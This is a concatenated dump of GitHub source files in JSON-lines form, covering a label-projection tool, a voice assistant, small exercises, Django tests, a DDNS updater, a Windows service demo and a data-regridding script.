sources_tags_type, sources_tags_ids, target_words, alignments\n ):\n if target_words and source_words:\n target_tags = sentence_projection(\n source_words=source_words,\n source_tags_type=source_tags_type,\n source_tags_ids=source_tags_ids,\n target_words=target_words,\n alignments=alignments,\n remove_puncs=remove_puncs,\n fill_gap_size=fill_gap_size,\n )\n\n assert len(target_words) == len(target_tags)\n\n output.append(\n \"\\n\".join([f\"{w} {t}\" for w, t in zip(target_words, target_tags)])\n )\n\n else:\n print(\n f\"Warning, empty sentence found. source_words: {source_words}. target_words: {target_words}\"\n )\n\n return \"\\n\\n\".join(output)\n\n\ndef dataset_projection(\n source_dataset: str,\n target_sentences: str,\n alignments_path: str,\n batch_size: int,\n output_path: str,\n remove_puncs: bool = True,\n fill_gap_size: int = 1,\n):\n print(\n f\"Datset projection:\\n\"\n f\"Source dataset: {source_dataset}.\\n\"\n f\"Target_sentences: {target_sentences}.\\n\"\n f\"alignments_path: {alignments_path}.\\n\"\n f\"batch_size: {batch_size}.\\n\"\n f\"output_path:{output_path}.\\n\"\n f\"remove_puncs: {remove_puncs}.\\n\"\n f\"fill_gap_size: {fill_gap_size}.\\n\"\n )\n\n os.makedirs(os.path.abspath(os.path.dirname(output_path)), exist_ok=True)\n\n data_loader = ProjectionDataloader(\n source_tsv=source_dataset,\n target_txt=target_sentences,\n alignments_talp=alignments_path,\n batch_size=batch_size,\n )\n data_loader_len = len(data_loader)\n\n data_loader = iter(data_loader)\n\n source_words, tags_type, tags_ids, target_words, alignment_dictionary = next(\n data_loader\n )\n\n projections = []\n\n projection_function = partial(\n sentences_projection, remove_puncs=remove_puncs, fill_gap_size=fill_gap_size\n )\n\n with open(output_path, \"w+\", encoding=\"utf8\") as output_file, tqdm(\n total=data_loader_len, desc=\"Annotation projection\"\n ) as pbar:\n while (\n source_words\n and tags_type\n and tags_ids\n and target_words\n and alignment_dictionary\n ):\n with multiprocessing.Pool(os.cpu_count()) as pool:\n\n async_job = pool.starmap_async(\n projection_function,\n zip(\n batch(source_words, n=os.cpu_count()),\n batch(tags_type, n=os.cpu_count()),\n batch(tags_ids, n=os.cpu_count()),\n batch(target_words, n=os.cpu_count()),\n batch(alignment_dictionary, n=os.cpu_count()),\n ),\n )\n\n if projections:\n print(\"\\n\\n\".join(projections), file=output_file)\n print(file=output_file)\n\n pbar.update(1)\n\n try:\n (\n source_words,\n tags_type,\n tags_ids,\n target_words,\n alignment_dictionary,\n ) = next(data_loader)\n except StopIteration:\n source_words = []\n tags_type = []\n tags_ids = []\n target_words = []\n alignment_dictionary = []\n\n projections = async_job.get()\n\n if projections:\n print(\"\\n\\n\".join(projections), file=output_file)\n print(file=output_file)\n","repo_name":"ikergarcia1996/Easy-Label-Projection","sub_path":"projection/annotation_proyection.py","file_name":"annotation_proyection.py","file_ext":"py","file_size_in_byte":11108,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"10928331536","text":"import speech_recognition as sr\nimport pyttsx3\n\ndef listen():\n r = sr.Recognizer()\n with sr.Microphone() as source:\n print(\"Dinliyorum...\")\n r.adjust_for_ambient_noise(source)\n audio = r.listen(source)\n\n try:\n text = r.recognize_google(audio, language=\"en-EN\") # Türkçe olarak tanıma yapmak için \"tr-TR\" kullanıyoruz\n print(\"Anlaşılan metin: \", text)\n return text\n except sr.UnknownValueError:\n print(\"Ses anlaşılamadı.\")\n except sr.RequestError as e:\n print(\"Ses tanıma hizmetine erişilemedi; {0}\".format(e))\n\ndef speak(text):\n engine = pyttsx3.init()\n engine.setProperty('rate', 150) # Konuşma hızı ayarlanabilir (isteğe bağlı)\n engine.setProperty('volume', 0.8) # Ses düzeyi ayarlanabilir (isteğe bağlı)\n engine.say(text)\n engine.runAndWait()\n\ndef assistant():\n while True:\n command = listen()\n if command == \"stop\":\n break\n \n if \"hello\" in command:\n response = \"hi\"\n speak(response)\n elif \"what's up\" in command:\n response = \"I'm fine thanks how about you\"\n speak(response)\n\n else:\n response = \"Anladım. Komutunuz: \" + command\n speak(response)\n\nassistant()\n","repo_name":"osmn-byhn/JARVIS","sub_path":"jarvis.py","file_name":"jarvis.py","file_ext":"py","file_size_in_byte":1328,"program_lang":"python","lang":"tr","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"10788871347","text":"from bs4 import BeautifulSoup\n\nwith open(\"web_crawler/bs4_test/test.html\") as fin:\n html_doc = fin.read()\n\nsoup = BeautifulSoup(html_doc, \"html.parser\")\n\n# find a div node with id equal to content\ndiv_node = soup.find(\"div\", id = \"content\")\n\ntry:\n # find all html content with a tag\n inks = div_node.find_all(\"a\")\nexcept:\n print(\"html not found\")\nfinally:\n print(\"finally\")\n\n# find all content with img tag\nimg = soup.find(\"img\")\nprint(img[\"src\"])\n\n\n# for link in links:\n# print(link.name, link[\"href\"], link.get_text())\n\n","repo_name":"qyy752457002/Requests_Urllib_Projects","sub_path":"bs4_test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14027101327","text":"#https://atcoder.jp/contests/abc202/tasks/abc202_b\n\ns = input()\n\n#反転する\n#6=>7=>9\n#9=>5=>6\ns = s[::-1].replace(\"6\", \"7\").replace(\"9\", \"5\").replace(\"7\", \"9\").replace(\"5\", \"6\")\n#5,7は含まれないため\nprint(s)\n\n\n\"\"\"\n提出情報\n提��日時\t2021-05-28 10:12:29\n問題\tB - 180°\nユーザ\tOrcaDive_U \n言語\tPython (3.8.2)\n得点\t200\nコード長\t145 Byte\n結果\t\n実行時間\t29 ms\nメモリ\t9004 KB\n\n\"\"\"","repo_name":"Runacy/ProblemsSolution_myself","sub_path":"B180.py","file_name":"B180.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"72118188424","text":"import csv\n\n# with open(\"sample.csv\", \"r\", newline=\"\") as csv_file:\n# data = csv.reader(csv_file, delimiter=\"!\", skipinitialspace=True, quotechar=\",\")\n#\n# for item in data:\n# # print(item)\n# # print(item[0], item[1], item[2], item[3], item[4])\n# print(item[1])\n\n\ndata_header = [\"sl\", \"Name\", \"Age\"]\nscholar_data = [\n [\"1\", \"Jb\", \"29\"],\n [\"2\", \"jbg\", \"28\"],\n [\"3\", \"bala\", \"25\"]\n ]\n\nwith open (\"scholars.csv\", \"w\") as csv_file:\n data = csv.writer(csv_file)\n data.writerow(data_header)\n data.writerows(scholar_data)\n","repo_name":"Jeyabalaganesh/New_Project_23052021","sub_path":"Day25_CSV files.py","file_name":"Day25_CSV files.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"6439009536","text":"import os\nfrom difflib import SequenceMatcher\nfrom pprint import pprint\n\n\ndef get_files(subdir):\n contents = os.listdir(subdir)\n dirs = [os.path.join(subdir, i) for i in contents if os.path.isdir(os.path.join(subdir, i))]\n files = [os.path.join(subdir, i) for i in contents if os.path.isfile(os.path.join(subdir, i))]\n files = [i for i in files if i[-3:] in ['avi', 'mkv', 'mp4']]\n for my_dir in dirs:\n files = get_files(my_dir) + files\n return files\n\n\ndef similar(a, b):\n p = round(SequenceMatcher(None, a, b).ratio(), 2)\n return p\n\n\nclass Collection:\n def __init__(self, path):\n self.path = path\n self.files = []\n self.collection = {}\n self.scan()\n\n def validate(self):\n if self.path == '':\n return False\n return True\n\n def scan(self):\n if self.validate():\n struct = []\n struct += get_files(self.path)\n self.files = sorted(struct)\n\n def discover_show(self, show_name, episode_key):\n mem = ['', -999.00]\n for file in self.files:\n new_file = self.shorten_path_to_file(file)\n clean_file = file.lower().replace('.', ' ')\n clean_show_name = self.clean_show_name(show_name)\n parts = clean_file.split(os.path.sep)\n if len(parts) > 1:\n if clean_show_name == parts[0] and episode_key.lower() in clean_file:\n mem = [new_file, 1.00]\n break\n\n if clean_show_name in clean_file and episode_key.lower() in clean_file:\n mem = [new_file, 0.99]\n # break\n\n prob = similar(f\"{show_name}.{episode_key}\", new_file)\n if mem[1] < prob:\n mem = [new_file, prob]\n\n return mem\n\n def shorten_path_to_file(self, file):\n return file.replace(self.path + os.path.sep, '')\n\n def clean_show_name(self, show_name):\n if show_name == 'Stargate SG-1':\n return 'gwiezdne wrota'\n return show_name.lower().replace('\\'', '').replace('...', '')\n\n def is_deleted(self, file):\n file_path = os.path.join(self.path, file)\n if os.path.isfile(file_path):\n return False\n return True\n\n def delete(self, file):\n file_path = os.path.join(self.path, file)\n print(f'Removing {file_path}')\n os.unlink(file_path)\n","repo_name":"Czupak/SeriesWatcher","sub_path":"serieswatcher/collection.py","file_name":"collection.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70082363785","text":"from typing import List\n\n\nclass Solution:\n def maxChunksToSorted(self, arr: List[int]) -> int:\n n = len(arr)\n ans = 0\n\n curMax = -1\n for i in range(n):\n if arr[i] > curMax:\n curMax = arr[i]\n\n if curMax == i:\n ans += 1\n curMax = -1\n\n return ans\n","repo_name":"tiandiyijian/myLeetcode","sub_path":"769.py","file_name":"769.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"70475863624","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:Irving\n\nclass Weapon:\n def prick(self, obj): # 这是该装备的主动技能, 扎死对方\n obj.life -= 500 # 假设攻击力为500\n\nclass Person: # 定义一个人类\n role = 'person' # 人的角色属性都是人\n\n def __init__(self, name, life):\n self.name = name # 每一个角色都有自己的昵称;\n self.weapon = Weapon() # 给角色绑定一个武器;\n self.life = life\n\negg = Person('egon', 600)\np1 = Person('bb', 600)\negg.weapon.prick(p1)\nprint(p1.life)","repo_name":"Xuchaoqiang/Luffycity","sub_path":"第三模块(面向对象、网络编程)/面向对象编程/组合.py","file_name":"组合.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"15392305920","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.datetime_safe\nimport datetime\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('blogs', '0002_auto_20140926_2033'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='edition',\n options={'ordering': ['modified_at']},\n ),\n migrations.AlterModelOptions(\n name='post',\n options={'ordering': ['modified_at']},\n ),\n migrations.AddField(\n model_name='edition',\n name='created_at',\n field=models.DateTimeField(default=datetime.date(2014, 9, 26), auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='edition',\n name='modified_at',\n field=models.DateTimeField(default=datetime.date(2014, 9, 26), auto_now=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='post',\n name='created_at',\n field=models.DateTimeField(default=django.utils.datetime_safe.date.today, auto_now_add=True),\n preserve_default=False,\n ),\n migrations.AddField(\n model_name='post',\n name='modified_at',\n field=models.DateTimeField(default=datetime.datetime(2014, 9, 26, 21, 6, 46, 197275), auto_now=True),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='edition',\n name='post',\n field=models.ForeignKey(to='blogs.Post', related_name='editions'),\n ),\n ]\n","repo_name":"ericmok/djangosimpleblog","sub_path":"blogs/migrations/0003_auto_20140926_2106.py","file_name":"0003_auto_20140926_2106.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"39444478150","text":"# Example code for a Python backend to handle `submitURL` posts. See tools/backend\n# for a more extensive example using nodejs to write the backend server.\n\nimport json\nimport uvicorn\nfrom fastapi import FastAPI, Body\nfrom fastapi.middleware.cors import CORSMiddleware\n\n\napp = FastAPI()\n# Add cors configuration to allow requests from any origin\napp.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n)\n\n# Set submitToken to bind this submission to its corresponding task\n@app.post(\"/\")\ndef demo(submitToken: str, annotation: dict = Body(...)):\n print(\"annotation:\", json.dumps(annotation, sort_keys=True, indent=4, separators=(\",\", \":\")))\n print(\"submitToken:\", submitToken)\n return \"OK\"\n\n\nif __name__ == \"__main__\":\n # 'backend' is the name of this file\n uvicorn.run(app=\"backend:app\", host=\"localhost\", port=8000, reload=True, debug=True)\n","repo_name":"anucvml/vidat","sub_path":"tools/python/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"81"} +{"seq_id":"45460752006","text":"from DomainRecordChanger import DomainRecordChanger\nfrom SettingsManager import SettingsManager\nfrom urllib.request import urlopen\nimport logging\nimport sys\n\n\nclass DDNS:\n settings_manager = None\n ip_url = None\n domain_settings = None\n ip_addrs = dict()\n\n @staticmethod\n def init_logging():\n log_settings = DDNS.settings_manager.get_log_settings()\n log_level = log_settings[\"logLevel\"]\n if log_level.lower() == \"debug\":\n log_level = logging.DEBUG\n elif log_level.lower() == \"info\":\n log_level = logging.INFO\n elif log_level.lower() == \"warning\":\n log_level = logging.WARNING\n else:\n log_level = logging.DEBUG\n log_format = \"%(asctime)s - %(levelname)s - %(message)s\"\n logging.basicConfig(filename=log_settings[\"logFileName\"], level=log_level,format=log_format)\n\n @staticmethod\n def read_settings():\n DDNS.ip_url = DDNS.settings_manager.get_ip_url()\n DDNS.domain_settings = DDNS.settings_manager.get_domain_settings()\n\n @staticmethod\n def main(settings_path=\"cloudflareddnsSettings.json\"):\n DDNS.settings_manager = SettingsManager(settings_path)\n if not DDNS.settings_manager.is_valid:\n sys.exit(1)\n DDNS.init_logging()\n DDNS.read_settings()\n if not DDNS.settings_manager.is_valid:\n logging.error(\"Bad configuration.\")\n sys.exit(1)\n else:\n pass\n # logging.info(\"--------DDNS script started--------\")\n DDNS.ip_addrs[\"A\"] = str(urlopen(DDNS.ip_url[\"A\"]).read(), encoding='utf-8').strip()\n DDNS.ip_addrs[\"AAAA\"] = str(urlopen(DDNS.ip_url[\"AAAA\"]).read(), encoding='utf-8').strip()\n for single_domain_config in DDNS.domain_settings:\n dm = DomainRecordChanger(single_domain_config, DDNS.ip_addrs)\n dm.start_ddns()\n # logging.info(\"---------DDNS script ended---------\")\n","repo_name":"un-lock-able/cloudflare-ddns","sub_path":"ddns.py","file_name":"ddns.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"29184861282","text":"#resolver erro ModuleNotFoundError: No module named 'win32serviceutil' \n#https://stackoverflow.com/a/70625723/9930021\nimport os\nimport sys\nimport site\n\nservice_directory = os.path.dirname(__file__)\nsource_directory = os.path.abspath(service_directory)\nos.chdir(source_directory)\nvenv_base = os.path.abspath(os.path.join(source_directory, \"venv\"))\nsys.path.append(\".\")\nold_os_path = os.environ['PATH']\nos.environ['PATH'] = os.path.join(venv_base, \"Scripts\") + os.pathsep + old_os_path\nsite_packages = os.path.join(venv_base, \"Lib\", \"site-packages\")\nprev_sys_path = list(sys.path)\nsite.addsitedir(site_packages)\nsys.real_prefix = sys.prefix\nsys.prefix = venv_base\n\nnew_sys_path = list()\nfor item in list(sys.path):\n if item not in prev_sys_path:\n new_sys_path.append(item)\n sys.path.remove(item)\nsys.path[: 0] = new_sys_path\n\nimport time\nimport random\nfrom pathlib import Path\nfrom SMWinservice import SMWinservice\n\nclass MyServicePython(SMWinservice):\n _svc_name_ = \"MyServicePython\"\n _svc_display_name_ = \"My Service Python\"\n _svc_description_ = \"Simple service in python for windows\"\n\n def start(self):\n self.isrunning = True\n\n def stop(self):\n self.isrunning = False\n\n def main(self):\n i = 0\n while self.isrunning:\n random.seed()\n x = random.randint(1, 1000000)\n Path(f'c:{x}.txt').touch()\n time.sleep(5)\n\nif __name__ == '__main__':\n MyServicePython.parse_command_line()\n","repo_name":"ugleiton/python_windows_service","sub_path":"my_service_windows.py","file_name":"my_service_windows.py","file_ext":"py","file_size_in_byte":1483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31209683378","text":"from unittest import skipIf\nfrom django.test import TestCase\n\nfrom django_fsm_log.models import StateLog\nfrom django_fsm_log.managers import PendingStateLogManager\n\nfrom .models import Article\nfrom mock import patch\n\ntry:\n from django_fsm import TransitionNotAllowed\n DJANGO_FSM_VER_1 = False\nexcept ImportError: # django_fsm 1.x\n DJANGO_FSM_VER_1 = True\n from django_fsm.db.fields import TransitionNotAllowed\n\ntry:\n from django.contrib.auth import get_user_model\nexcept ImportError: # django < 1.5\n from django.contrib.auth.models import User\nelse:\n User = get_user_model()\n\n\nclass StateLogModelTests(TestCase):\n def setUp(self):\n self.article = Article.objects.create(state='draft')\n self.user = User.objects.create_user(username='jacob', password='password')\n\n def test_get_available_state_transitions(self):\n self.assertEqual(len(list(self.article.get_available_state_transitions())), 2)\n\n @skipIf(DJANGO_FSM_VER_1, 'requires django-fsm>1')\n def test_get_all_state_transitions(self):\n self.assertEqual(len(list(self.article.get_all_state_transitions())), 4)\n\n def test_log_created_on_transition(self):\n self.assertEqual(len(StateLog.objects.all()), 0)\n\n self.article.submit()\n self.article.save()\n\n self.assertEqual(len(StateLog.objects.all()), 1)\n\n def test_log_not_created_if_transition_fails(self):\n self.assertEqual(len(StateLog.objects.all()), 0)\n\n with self.assertRaises(TransitionNotAllowed):\n self.article.publish()\n self.article.save()\n\n self.assertEqual(len(StateLog.objects.all()), 0)\n\n def test_by_is_set_when_passed_into_transition(self):\n self.article.submit(by=self.user)\n\n log = StateLog.objects.all()[0]\n self.assertEqual(self.user, log.by)\n\n def test_by_is_none_when_not_set_in_transition(self):\n self.article.submit()\n\n log = StateLog.objects.all()[0]\n self.assertIsNone(log.by)\n\n def test_logged_state_is_new_state(self):\n self.article.submit()\n\n log = StateLog.objects.all()[0]\n self.assertEqual(log.state, 'submitted')\n\n def test_logged_transition_is_name_of_transition_method(self):\n self.article.submit()\n\n log = StateLog.objects.all()[0]\n self.assertEqual(log.transition, 'submit')\n\n def test_logged_content_object_is_instance_being_transitioned(self):\n self.article.submit()\n\n log = StateLog.objects.all()[0]\n self.assertEqual(log.content_object, self.article)\n\n\nclass StateLogManagerTests(TestCase):\n def setUp(self):\n self.article = Article.objects.create(state='draft')\n self.user = User.objects.create_user(username='jacob', password='password')\n\n def test_for_queryset_method_returns_only_logs_for_provided_object(self):\n article2 = Article.objects.create(state='draft')\n article2.submit()\n\n self.article.submit()\n self.article.publish()\n\n self.assertEqual(len(StateLog.objects.for_(self.article)), 2)\n for log in StateLog.objects.for_(self.article):\n self.assertEqual(self.article, log.content_object)\n\n\nclass PendingStateLogManagerTests(TestCase):\n def setUp(self):\n if not hasattr(StateLog, 'pending_objects'):\n StateLog.add_to_class('pending_objects', PendingStateLogManager())\n self.article = Article.objects.create(state='draft')\n self.user = User.objects.create_user(username='jacob', password='password')\n self.create_kwargs = {\n 'by': self.user,\n 'state': 'submitted',\n 'transition': 'submit',\n 'content_object': self.article\n }\n\n def test_get_cache_key_for_object_returns_correctly_formatted_string(self):\n expected_result = 'StateLog:{}:{}'.format(\n self.article.__class__.__name__,\n self.article.pk\n )\n result = StateLog.pending_objects._get_cache_key_for_object(self.article)\n self.assertEqual(result, expected_result)\n\n @patch('django_fsm_log.managers.cache')\n def test_create_pending_sets_cache_item(self, mock_cache):\n expected_cache_key = StateLog.pending_objects._get_cache_key_for_object(self.article)\n StateLog.pending_objects.create(**self.create_kwargs)\n cache_key = mock_cache.set.call_args_list[0][0][0]\n cache_object = mock_cache.set.call_args_list[0][0][1]\n self.assertEqual(cache_key, expected_cache_key)\n self.assertEqual(cache_object.state, self.create_kwargs['state'])\n self.assertEqual(cache_object.transition, self.create_kwargs['transition'])\n self.assertEqual(cache_object.content_object, self.create_kwargs['content_object'])\n self.assertEqual(cache_object.by, self.create_kwargs['by'])\n\n @patch('django_fsm_log.managers.cache')\n def test_create_returns_correct_state_log(self, mock_cache):\n log = StateLog.pending_objects.create(**self.create_kwargs)\n self.assertEqual(log.state, self.create_kwargs['state'])\n self.assertEqual(log.transition, self.create_kwargs['transition'])\n self.assertEqual(log.content_object, self.create_kwargs['content_object'])\n self.assertEqual(log.by, self.create_kwargs['by'])\n\n @patch('django_fsm_log.managers.cache')\n def test_commit_for_object_saves_log(self, mock_cache):\n log = StateLog.objects.create(**self.create_kwargs)\n mock_cache.get.return_value = log\n StateLog.pending_objects.commit_for_object(self.article)\n persisted_log = StateLog.objects.order_by('-pk').all()[0]\n self.assertEqual(log.state, persisted_log.state)\n self.assertEqual(log.transition, persisted_log.transition)\n self.assertEqual(log.content_object, persisted_log.content_object)\n self.assertEqual(log.by, persisted_log.by)\n\n @patch('django_fsm_log.managers.cache')\n def test_commit_for_object_deletes_pending_log_from_cache(self, mock_cache):\n StateLog.pending_objects.create(**self.create_kwargs)\n StateLog.pending_objects.commit_for_object(self.article)\n mock_cache.delete.assert_called_once_with(StateLog.pending_objects._get_cache_key_for_object(self.article))\n\n @patch('django_fsm_log.managers.cache')\n def test_get_for_object_calls_cache_get_with_correct_key(self, mock_cache):\n cache_key = StateLog.pending_objects._get_cache_key_for_object(self.create_kwargs['content_object'])\n StateLog.pending_objects.get_for_object(self.create_kwargs['content_object'])\n mock_cache.get.assert_called_once_with(cache_key)\n","repo_name":"smaggs/django-fsm-log","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"391580017","text":"import os\n\ndef read_from_file(filename):\n file_path = os.path.join(\n os.path.dirname(__file__), filename)\n result = list()\n with open(file_path) as fh:\n lines = fh.read().split('\\n')\n for line in lines:\n result.extend([int(num) for num in line.split(',')])\n return result\n\ndef main():\n x, y, z = 0, 0, 0\n inputs = read_from_file('input.txt')\n for i in inputs:\n for j in inputs:\n for k in inputs:\n if i == j or i == k or j == k:\n continue\n if i + j + k == 2020:\n x = i\n y = j\n z = k \n break\n if x and y and z:\n break\n if x and y and z:\n break\n print(x, y, z, x+y+z)\n\nif __name__ == \"__main__\":\n main()","repo_name":"ayushlalshrestha/coding-challenges","sub_path":"adventofcode/2020/day1/1_1_advent.py","file_name":"1_1_advent.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"9824261559","text":"import logging\nfrom flask import Flask\nfrom example_1.entrypoint import (\n create_container,\n register_aggregated_uow_hooks,\n register_runtime_message_dispatcher,\n create_message_dispatcher_uow,\n)\nfrom example_1.flask_app.app import configure_app\nfrom pocpoc.api.utils.debugging import setup_debug_logging\n\n\ncontainer = create_container()\nregister_runtime_message_dispatcher(container)\nregister_aggregated_uow_hooks(container, create_message_dispatcher_uow)\n\napp = Flask(__name__)\n\nsetup_debug_logging(\"example_1.*\", level=logging.DEBUG)\n\n# setup_debug_logging(\n# \"pocpoc*\",\n# level=logging.INFO,\n# )\n\n# setup_debug_logging(\n# \"flask*\",\n# level=logging.INFO,\n# )\n\nconfigure_app(app, container.get_class_initializer())\n\nif __name__ == \"__main__\":\n app.run(debug=True, host=\"0.0.0.0\", port=5000)\n","repo_name":"LuscasLeo/pocpoc","sub_path":"src/example_1/flask_app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"42362601088","text":"import regridcart as rc\nimport xarray as xr\nimport numpy as np\nfrom datetime import datetime, timedelta\nfrom matplotlib import pyplot as plt\nimport cartopy.crs as ccrs\nimport cartopy.feature as cfeature\nimport cmocean.cm as cmo\nimport hvplot.xarray\nimport geoviews as gv\n\n# PICK UP\n# need the crs of mar, it should be in a 'grid-mapping' variable but there isn't one, need to search through old notes \n\n# %% open the dataset and get the main info\nds = xr.open_dataset(\"/Users/coop558/work/data/greenland/mar3.11/MARv3.11-ERA5-15km-2018.nc\")\n\n# try to assing the lat.lon to x,y coords\nds = ds.assign_coords(lon=ds.LON,lat=ds.LAT)\n\n# other options: chunks, chunksizes, dtypes, encoding, imag, loc, nbytes, real, xindexes\nvariables = ds.data_vars\ndims = ds.dims\natts = ds.attrs\ncoords = ds.coords\nidxs = ds.indexes\nsizes = ds.sizes\ntime = ds.TIME\n\n# %% build a time array\nt1 = datetime(2018,1,1,0,0,0)\nt2 = datetime(2019,1,1,0,0,0)\ndt = timedelta(hours=1)\nt = np.arange(t1,t2,dt).astype(datetime)\n\n# %% read the melt and runoff for a single grid cell\n\n# idx 54,21 should be good ones for cheecking based on ncrowcol but don't seem to be \nmelt = ds.MEH.sel(Y21_199=54,X10_105=21,method='nearest')\nmelt = melt.values.flatten()\nmelt = np.cumsum(melt/1000)\nplt.plot(t,melt)\n\n# get the lat lon value for the grid cell\nlatp = ds.LAT.sel(Y21_199=54,X10_105=21,method='nearest')\nlonp = ds.LON.sel(Y21_199=54,X10_105=21,method='nearest')\n\n# %% read the melt and runoff for a single grid cell using the lat lon values\n\n# extract all lat lon values from the ds\nlatv = ds.LAT.values.flatten()\nlonv = ds.LON.values.flatten()\n\n# set the lat lon for the point\nlat0 = 67.035\nlon0 = -48.90\n\n# find the index of the point on the grid\nidx = np.argmin(np.abs(latv-lat0)+np.abs(lonv-lon0))\n\n# get the melt timeseries for the point\nmelt = ds.MEH.values.flatten()[idx]\n\n# plot the melt timeseries\nmelt = np.cumsum(melt/1000)\nplt.plot(melt)\n\n# this selects one grid cell and flattens but the values are all zero\n# runoff = ds.MEH.sel(Y21_199=54,X10_105=21,method='nearest')\n# runoff = runoff.values.flatten()\n# pl.plot(t,runoff)\n# runoff.max()\n\n# %% compute the time-average and make a map\n\n# I could not figure out how to unstack with xarray, so use np (converts to ndarray)\nMEH = ds.MEH/1000\nMEH = MEH.stack(hour=('TIME','ATMXH'))\nMEH = MEH.cumsum(dim='hour')\nMEH = MEH.mean(dim='hour')\n\n# MEH = np.vstack(MEH)\n# MEH = np.cumsum(MEH,axis=0)\n# MEH = np.mean(MEH,axis=0)\n\nfig, ax = plt.subplots()\nMEH.plot(x='lon',y='lat')\n\nfig, ax = plt.subplots()\nMEH.plot()\n\n# add a symbol for the location of the time series\nax.plot(-41.18,71.4,'r*',transform=ccrs.PlateCarree())\n\n\n# %% make a map\n\n# proj = ccrs.NorthPolarStereo(central_longitude=-40,true_scale_latitude=70)\n# proj = ccrs.Stereographic(central_latitude=70,central_longitude=-40)\n# proj = ccrs.NorthPolarStereo()\ncoast_10m = cfeature.NaturalEarthFeature('physical', 'land', '10m',\n edgecolor='k', facecolor='0.8')\nproj = ccrs.LambertConformal()\nfig, ax = plt.subplots(1, 1, sharex=True, sharey=True, figsize=(10, 5),\n subplot_kw={'projection': proj})\nMEH.plot(x='lon', y='lat',transform=proj,cmap=cmo.haline, ax=ax)\n# ax.add_feature(coast_10m)\nax.set_extent([-70, -40, 60, 75], crs=proj)\nax.set_title('')\ngl = ax.gridlines(draw_labels=True, x_inline=False, y_inline=False, \n xlocs=np.arange(-70,-40, 5), ylocs=np.arange(60, 75, 5))\n\n# manipulate `gridliner` object to change locations of labels\ngl.top_labels = False\ngl.right_labels = False\n\n\n# %%\n\n# lat0 = ds.lat.mean()\n# lon0 = ds.lon.mean()\n\ntarget_domain = rc.LocalCartesianDomain(\n central_latitude=71.4,\n central_longitude=-41.18,\n l_meridional=3000.0e3,\n l_zonal=2000.0e3,\n)\ntarget_domain.plot_outline()\n# target_domain.latlon_bounds\n\n\ndx = 15.0e3 # new resoluion 1km\nda_regridded = rc.resample(target_domain, da=MEH, dx=dx)\n\n\nfig, ax = plt.subplots()\nda_regridded.plot()\n\n\n# %%\n","repo_name":"mgcooper/remap","sub_path":"test_regridding.py","file_name":"test_regridding.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18700279537","text":"# Author : Abilash1907\ndef compare(s1, s2):\n m = len(s1)\n n = len(s2)\n j = 0\n i = 0\n while (i < n and j < m):\n if (s1[j] == s2[i]):\n j += 1\n i += 1\n return (j == m)\n\n\ndef longest(d, st):\n r = \"\"\n le = 0\n for i in d:\n if (le < len(i) and compare(i, st)):\n r = i\n le = len(i)\n return r\nn = int(input())\nl = input(\"dict=\").split(' ')\nl = {n for n in l}\ns = input(\"str=\")\nprint(longest(l, s))\n","repo_name":"Developers-VAST/Code-Hack","sub_path":"Solutions/solution6.py","file_name":"solution6.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"81"} +{"seq_id":"4405420478","text":"from collections import defaultdict\n\n\ndef min_rewards(scores):\n rewards = [1] * len(scores)\n for i in range(1, len(scores)):\n if scores[i] > scores[i - 1]:\n rewards[i] = rewards[i - 1] + 1\n\n for i in range(len(scores) - 2, -1, -1):\n if scores[i] > scores[i + 1]:\n rewards[i] = max(rewards[i], rewards[i + 1] + 1)\n return sum(rewards)\n\nif __name__ == '__main__':\n scores = [8, 4, 2, 1, 3, 6, 7, 9, 5]\n expected = 25\n print(f\"Actual result: {min_rewards(scores)}. Expected: 